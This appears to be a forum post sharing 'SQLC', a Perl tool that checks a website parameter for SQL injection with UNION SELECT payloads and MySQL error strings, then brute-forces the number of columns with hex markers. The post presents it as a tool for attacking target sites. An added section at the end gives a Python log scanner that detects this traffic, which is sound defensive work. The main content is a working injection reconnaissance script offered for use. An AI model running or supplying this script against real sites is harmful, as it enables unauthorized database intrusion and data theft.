[Tool] SQLC (SQL Columnator) - by xassiz






SQLC is my tool written in Perl, able to return the number of columns of a website after checking whether it is really vulnerable.


An example of its use:




Here is the code:


#!/usr/bin/perl

use LWP::UserAgent;

if (!$ARGV[0]) {


print q (


.d8888. .d88b. db .o88b.
88' YP .8P Y8. 88 d8P Y8
`8bo. 88 88 88 8P
`Y8b. 88 88 88 8b
db 8D `8P d8' 88booo. Y8b d8
`8888Y' `Y88'Y8 Y88888P `Y88P'


[+] Modo de uso:

perl SQLC.pl http://www.target.com/news.php?id=

-------------------------------

Coded by xassiz


);

exit 1;

}

print q (


.d8888. .d88b. db .o88b.
88' YP .8P Y8. 88 d8P Y8
`8bo. 88 88 88 8P
`Y8b. 88 88 88 8b
db 8D `8P d8' 88booo. Y8b d8
`8888Y' `Y88'Y8 Y88888P `Y88P'

);

$target = $ARGV[0];

print("\n [+] Website a atacar: $target \n\n");
print("\n [?] Comprobando vulnerabilidad \n");

# Vulnerability check: append a one-column UNION SELECT and look for MySQL error text in the response.
$vulnerabilidad = LWP::UserAgent->new() or die;
$comprobacion = $vulnerabilidad->get($target."-1+union+select+69--");

if ($comprobacion->content =~ /The used SELECT statements have a different number of columns/
    || $comprobacion->content =~ /You have an error in your SQL syntax/
    || $comprobacion->content =~ /mysql_fetch/
    || $comprobacion->content =~ /mysql_num_rows/
    || $comprobacion->content =~ /MySQL/)
{

print("\n [+] Objetivo Vulnerable \n\n\a");
print("\n [?] Buscando numero de columnas \n");

$count = 2;
$max = 500;

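# 0x78617373697a is the hex encoding of the string "xassiz"; it is the marker searched for in the response.
$precolumnator = LWP::UserAgent->new() or die; # unused: the request below reuses $vulnerabilidad
$precolumns = $vulnerabilidad->get($target."-1+union+select+0x78617373697a--");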

if ($precolumns->content =~ /xassiz/)
{
print("\n [+] La website tiene 1 columna \n\n\a");

exit 1;
}

$inject = ",0x78617373697a";

# One more marker is appended per iteration until it appears in the page or $max is reached.
while ($count <= $max) {
    $columnator = LWP::UserAgent->new() or die; # unused: the request below reuses $vulnerabilidad
    $columns = $vulnerabilidad->get($target."-1+union+select+0x78617373697a".$inject."--");

    if ($columns->content =~ /xassiz/)
    {
        print("\n [+] La website tiene $count columnas \n\n\a");
        exit 1;
    }

    $inject = $inject.",0x78617373697a";
    $count++;
}

print("\n [-] No se encontro el numero de columnas \n\n\a");
exit 1;

} else {

print("\n [-] Objetivo No Vulnerable \n\n\a");

exit 1;

}

#Author = xassiz;
#Blog = xassiz.blogspot.com;


I hope you like it, friends! Regards
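
A defender's view of the traffic this script generates, as an added example that is not part of the original post: the Python below scans a web access log for the script's two request shapes (the `union select 69` check and the growing list of `0x78617373697a` markers) and groups them per client. The log lines, IP addresses and the `detect_sqlc` name are constructed for illustration; the `libwww-perl` user agent is the LWP::UserAgent default, which the script does not override.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

MARKER = "0x78617373697a"  # hex of "xassiz", the marker hard-coded in the script
CHECK = re.compile(r"union\s+select\s+69\s*--", re.I)
ENUM = re.compile(r"union\s+select\s+((?:%s\s*,?\s*)+)--" % MARKER, re.I)
LOG = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Constructed sample access log (combined format); IPs are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=-1+union+select+69-- HTTP/1.1" 200 512 "-" "libwww-perl/6.05"
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=-1+union+select+0x78617373697a-- HTTP/1.1" 200 512 "-" "libwww-perl/6.05"
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=-1+union+select+0x78617373697a,0x78617373697a-- HTTP/1.1" 200 512 "-" "libwww-perl/6.05"
192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?id=-1+union+select+0x78617373697a,0x78617373697a,0x78617373697a-- HTTP/1.1" 200 900 "-" "libwww-perl/6.05"
203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

def detect_sqlc(log_text):
    """Return {client_ip: summary} for clients whose requests match the SQLC pattern."""
    seen = defaultdict(lambda: {"check": False, "columns": [], "lwp_agent": False})
    for line in log_text.splitlines():
        m = LOG.match(line)
        if not m:
            continue
        ip, url, _status, agent = m.groups()
        query = unquote_plus(url)  # '+' and %XX decoded before matching
        enum = ENUM.search(query)
        if not (enum or CHECK.search(query)):
            continue
        entry = seen[ip]
        entry["lwp_agent"] |= agent.lower().startswith("libwww-perl")
        if enum:
            entry["columns"].append(enum.group(1).lower().count(MARKER))
        else:
            entry["check"] = True
    findings = {}
    for ip, e in seen.items():
        cols = e["columns"]
        # Enumeration signature: the marker count grows by exactly one per request.
        stepping = len(cols) >= 2 and all(b - a == 1 for a, b in zip(cols, cols[1:]))
        findings[ip] = {"check_probe": e["check"], "probes": len(cols),
                        "max_columns": max(cols, default=0),
                        "incremental": stepping, "lwp_agent": e["lwp_agent"]}
    return findings
```

A client flagged with `incremental` set and a response size that changes on the last probe (900 bytes in the constructed sample) points at a parameter that should be moved to a parameterized query.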
